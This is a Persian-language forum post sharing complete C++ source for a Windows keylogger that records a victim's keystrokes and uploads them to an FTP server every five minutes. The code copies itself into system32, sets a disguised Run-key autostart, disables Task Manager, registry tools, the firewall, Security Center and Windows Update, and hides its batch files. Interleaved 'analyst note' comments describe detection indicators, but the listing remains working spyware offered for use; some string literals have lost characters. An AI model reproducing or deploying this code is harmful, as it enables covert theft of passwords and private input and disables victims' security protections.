Parsi Coders

نسخه‌ی کامل: سورس کد اف تی پی کیلاگر
سورس کد زیر یک کیلاگر به زبان سی پلاس پلاس هست که قابلیت ذخیره لاگ های سیستم قربانی بر روی ftp رو دارد.
FTP Keylogger
کد:
#include <windows.h>

#include <Winuser.h>

#include <string>

#include <fstream>

using namespace std;



// Name of the batch file that OpenBatFile() hands to ShellExecute on every cycle.
char BatchFile[20] = "system.bat";

// Passed as the lpParameters argument of the two ShellExecute calls in main().
// Nothing in this listing assigns it, so it keeps its zero-initialised (null) value.
char* params;



// Thread routine (main() starts it with CreateThread). It loops forever: sleep
// 300000 ms (five minutes), then ask the shell to "open" BatchFile with SW_HIDE,
// i.e. without a visible window. The loop has no exit, so nothing is returned.
//
// Analyst note: the observable effect is a batch file being launched by this
// process at a fixed five-minute cadence with no window. Process-creation
// logging that records parent, child and command line should surface that
// pattern; the regular interval is the distinguishing trait.
DWORD WINAPI OpenBatFile(LPVOID)

{

      for(;;) {

Sleep(300000);

ShellExecute(NULL, "open", BatchFile, NULL, NULL, SW_HIDE);}

}





// Translates a Windows virtual-key code into the text that main() appends to the
// capture log.
//
// Key: virtual-key code (main() passes values 8..190).
// Returns: a bracketed label for the named keys handled below, a single
// character for digits, numpad digits, letters, space and period, or an empty
// string when no branch matches.
//
// Analyst note: the bracketed labels ("[TABULATOR]", "[CAPITAL]", "[SNAPSHOT]",
// ...) are written verbatim into the log file, so they describe the on-disk
// format of the captured data and can help recognise such a file during triage.
std::string GetKey(int Key)

{

    std::string KeyString = "";



    // 8 is VK_BACK (Backspace); the label written for it is "[delete]".
    if (Key == 8)

        KeyString = "[delete]";

    // 13 is VK_RETURN; as printed in this listing the text written is the letter "n".
    else if (Key == 13)

        KeyString = "n";

    // 32 is VK_SPACE.
    else if (Key == 32)

        KeyString = " ";

    else if (Key == VK_PAUSE)

        KeyString = "[PAUSE]";

    else if (Key == VK_CAPITAL)

        KeyString = "[CAPITAL]";

    else if (Key == VK_SHIFT)

        KeyString = "[SHIFT]";

    else if (Key == VK_TAB)

        KeyString = "[TABULATOR]";

    else if (Key == VK_CONTROL)

        KeyString = "[CTRL]";

    else if (Key == VK_ESCAPE)

        KeyString = "[ESCAPE]";

    else if (Key == VK_END)

        KeyString = "[END]";

    else if (Key == VK_HOME)

        KeyString = "[HOME]";

    else if (Key == VK_LEFT)

        KeyString = "[LEFT]";

    else if (Key == VK_RIGHT)

        KeyString = "[RIGHT]";

    else if (Key == VK_UP)

        KeyString = "[UP]";

    else if (Key == VK_DOWN)

        KeyString = "[DOWN]";

    else if (Key == VK_SNAPSHOT)

        KeyString = "[SNAPSHOT]";

    else if (Key == VK_NUMLOCK)

        KeyString = "[NUMLOCK]";

    // 190 is VK_OEM_PERIOD, 110 is VK_DECIMAL (numpad period).
    else if (Key == 190 || Key == 110)

        KeyString = ".";

  

    // 96..105 are VK_NUMPAD0..VK_NUMPAD9; subtracting 48 yields the codes of '0'..'9',
    // and assigning the int stores it as a single character.
    else if (Key >=96 && Key <= 105)

        KeyString = Key-48;

    // 48..57 are the top-row digit keys, whose codes equal '0'..'9'; the range as
    // written also admits 58 and 59.
    else if (Key > 47 && Key < 60)

        KeyString = Key;

    // As written this condition is true for every Key value, so the letter
    // handling below always runs.
    if (Key != VK_LBUTTON || Key != VK_RBUTTON)

    {

        // 65..90 are the letter keys, whose codes equal 'A'..'Z'.
        if (Key > 64 && Key < 91)

        {

            // A non-zero GetKeyState(VK_CAPITAL) keeps the upper-case code;
            // otherwise 32 is added to obtain the lower-case letter.
            if (GetKeyState(VK_CAPITAL))

                KeyString = Key;

            else

            {

                Key = Key + 32;

                KeyString = Key;

            }

        }

    }



    return KeyString;

}



// Program entry point. In the order the visible code shows, it:
//   1. copies its own executable image into the Windows system directory;
//   2. writes a value named "MS-Windows-secretly" under the HKLM
//      ...CurrentVersion Run key, and a "DisableTaskMgr" value under the HKCU
//      ...Policies System key;
//   3. writes three batch files and one FTP command script beneath system32;
//   4. launches two of the batch files hidden and starts the OpenBatFile thread;
//   5. polls the keyboard forever and appends what GetKey() returns to log.txt.
// No return value of any API call is checked.
//
// NOTE(review): file and registry paths are quoted here as they are printed in
// this listing. The archived text appears to have lost characters inside string
// literals, so confirm every indicator against a real sample before relying on
// it in a detection.
//
// Analyst note: steps 1 and 2 write to the system directory and to HKLM, which
// normally requires an elevated token; under a standard-user account those
// steps would be expected to fail, and since results are unchecked, silently.
int main()

{

    // Block-scope declaration of WinMain; nothing in this listing defines or calls it.
    int WINAPI WinMain (HINSTANCE hThisInstance,

    HINSTANCE hPrevInstance,

    LPSTR lpszArgument,

    int nFunsterStil);

    

  char path[MAX_PATH];

  HMODULE GetModH = GetModuleHandle(NULL);

    

  char sys[MAX_PATH];

  // path = full path of the running executable; sys = the Windows system directory.
  GetModuleFileName(GetModH, path, sizeof(path));

  GetSystemDirectory(sys, sizeof(sys));

  // Appends the drop name (printed here as "\borg.exe") and copies the running
  // image there. Analyst note: an unsigned executable newly written into the
  // system directory by a non-installer process is a file-integrity signal.
  strcat(sys, "\borg.exe");

  CopyFile(path, sys, false);

    

  HKEY hKey, hKey2;

  

  unsigned char reg[2] = "0";

  

  // Autostart entry: a Run-key value named "MS-Windows-secretly" whose data is
  // the sys buffer (the copied executable's path). Programs listed under this key
  // are started at logon. Analyst note: the value name is a fixed string in this
  // listing and can be searched for directly in autoruns inventories.
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run", 0, KEY_SET_VALUE, &hKey );

  RegSetValueEx(hKey, "MS-Windows-secretly", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));

  // Creates/opens the per-user Policies System key and sets "DisableTaskMgr"
  // from the 2-byte reg buffer. Analyst note: a process other than group-policy
  // tooling writing this value is worth alerting on.
  RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System",&hKey2);

  RegSetValueEx(hKey2,"DisableTaskMgr",0,REG_DWORD,reg,sizeof(reg));

  RegCloseKey(hKey),(hKey2);



  // Removes any capture log left from an earlier run.
  DeleteFile("C:\WINDOWS\system32\log.txt");  

    

  // update.bat: a script that stops the "Security Center" and SharedAccess
  // services, builds kill.reg under %Temp% setting Start=dword:00000004 (the
  // "disabled" start type) for the SharedAccess, wuauserv and wscsvc service
  // keys, imports it with REGEDIT /S, then deletes the .reg file and itself.
  // Analyst note: changes to the Start value of these service keys, "net stop"
  // against them, and a silent regedit import from a batch file are each
  // loggable events; the script deleting itself means the file may be absent
  // afterwards while the registry changes remain.
  ofstream FWUP;

  FWUP.open("C:\WINDOWS\system32\update.bat");

  FWUP<<"@echo offn";

  FWUP<<"net stop ""Security Center""n";

  FWUP<<"net stop SharedAccessn";

  FWUP<<"> ""%Temp%.\kill.reg"" ECHO REGEDIT4n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO.n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess]n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO ""Start""=dword:00000004n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO.n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv]n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO ""Start""=dword:00000004n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO.n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wscsvc]n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO ""Start""=dword:00000004n";

  FWUP<<">>""%Temp%.\kill.reg"" ECHO.n";

  FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\kill.reg""n";

  FWUP<<"DEL ""%Temp%.\kill.reg""n";

  FWUP<<"DEL %0n";

  FWUP.close();  

    

  // syssvr.bat: a script whose single command sets the per-user
  // "disableregistrytools" policy value to 1 via "reg add ... /f".
  ofstream disable;

  disable.open("C:\WINDOWS\system32\syssvr.bat");

  disable<<"@echo offn";

  disable<<"reg add ""HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NULn";

  disable.close();  

  

  //write ur ftp-information's here

  // FTP command script, written to a file named config.sys under the drivers
  // directory. The server, user and password fields are placeholders in this
  // listing; the script's SEND line names log.txt as the file to upload.
  // Analyst note: the destination and its credentials sit in plaintext in this
  // file, so recovering it during response identifies where captured data was
  // sent. A text file with FTP commands under a drivers directory is itself
  // anomalous.
  ofstream log;

  log.open("C:\WINDOWS\system32\drivers\config.sys");

  log<<"OPEN ftpservern";

  log<<"USER usernamen";

  log<<"ftppasswordn";

  log<<"ASCIIn";

  log<<"SEND C:\WINDOWS\system32\log.txtn";

  log<<"BYEn";

  log<<"exitn";

  log.close();

  

  // system.bat: runs the built-in ftp client with -n -i -s:<script>, i.e. driven
  // entirely by the command script above. This is the file OpenBatFile() opens
  // every five minutes. Analyst note: ftp.exe started with a -s: script argument
  // by a batch file, and the outbound FTP control connection that follows, are
  // the network-side indicators of this design.
  ofstream Ausgabe;

  Ausgabe.open("C:\WINDOWS\system32\system.bat");

  Ausgabe<<"ftp -n -i -s:C:\WINDOWS\system32\drivers\config.sysn";

  Ausgabe<<"byen";

  Ausgabe<<"exitn";

  Ausgabe.close();

  

  // Runs the two policy/service scripts once, with hidden windows.
  ShellExecute(NULL, NULL, "C:\WINDOWS\system32\syssvr.bat", params, NULL, SW_HIDE);

  ShellExecute(NULL, NULL, "C:\WINDOWS\system32\update.bat", params, NULL, SW_HIDE);

  

  DWORD OpenBatch;

  

  // Starts the periodic-upload thread (see OpenBatFile).
  HANDLE hOpenBatFile = CreateThread(NULL, 0, OpenBatFile, 0, 0, &OpenBatch);

    

    // Capture log, opened for append.
    std::string Filename = "C:\WINDOWS\system32\log.txt";

    std::string TempString = "";

    std::fstream FStream;

    FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);



    // Capture loop: every 5 ms, query GetAsyncKeyState for each virtual-key code
    // from 8 to 190 and, when the low-order bit of the result is set, append
    // GetKey()'s text to the log. The stream is closed and reopened after each
    // write, so every recorded key reaches the file immediately.
    // Analyst note: a process with no visible window that calls GetAsyncKeyState
    // across the whole key range in a tight timed loop, while repeatedly
    // reopening one small file for append, is the behavioural signature
    // endpoint monitoring can key on.
    while(true)

    {

        // 0% CPU

        Sleep(5);



        for(int i = 8; i < 191; i++)

        {

           if(GetAsyncKeyState(i)&1 ==1)

           {

                TempString = GetKey (i);



                FStream.write(TempString.c_str(), TempString.size());

                FStream.close();

                FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);

           }

        }

    }

}